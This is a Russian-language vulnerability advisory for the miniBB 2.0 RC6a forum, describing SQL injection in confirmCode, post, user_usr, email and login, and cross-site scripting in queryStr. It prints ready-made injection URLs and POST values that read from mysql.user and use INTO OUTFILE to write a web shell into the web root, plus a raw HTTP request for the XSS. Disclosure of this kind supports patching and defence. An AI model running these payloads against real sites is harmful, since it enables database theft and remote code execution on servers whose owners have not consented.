Программа: miniBB 2.0 RC6a, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в
параметрах confirmCode и post в сценарии index.php. Удаленный пользователь может
с помощью специально сформированного URL выполнить произвольные SQL команды в
базе данных приложения.

Примеры:

/index.php?action=confirmpasswd&confirmCode=f’ union select » from mysql.user
INTO OUTFILE ‘/var/www/html/shell.php’/*
/index.php?action=delmsg&post=1′ union select 1,1 from mysql.user INTO OUTFILE
‘/tmp/passwd’/*
/index.php?action=editmsg&post=1′ union select 1,1 from mysql.user INTO OUTFILE
‘/tmp/passwd’/*

2. Уязвимость существует из-за недостаточной обработки входных данных в
параметрах “user_usr”, “email” и “login”. Удаленный пользователь может с помощью
специально сформированного POST запроса выполнить произвольные SQL команды в
базе данных приложения.

Пример:

user_usr=f’ union select »,’123′ from mysql.user INTO OUTFILE ‘/var/www/html/shell.php’/*
/?action=sendpass&email=f’ union select 0,0,» from mysql.user INTO OUTFILE ‘/var/www/html/shell.php’/*
/?action=registernew&login||email=1′ union select 1 from mysql.user INTO OUTFILE
‘/tmp/passwd’/*

3.Уязвимость существует из-за недостаточной обработки входных данных в параметре
“queryStr”. Удаленный пользователь может с помощью специально сформированного
POST запроса выполнить произвольный код сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Пример:

POST /index.php?sortBy=1 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: minibb.local:80
Content-Length: 91
Connection: Close

user_usr=1&user_pwd=1&mode=login&queryStr=">&pagetype=index

 



Оставить мнение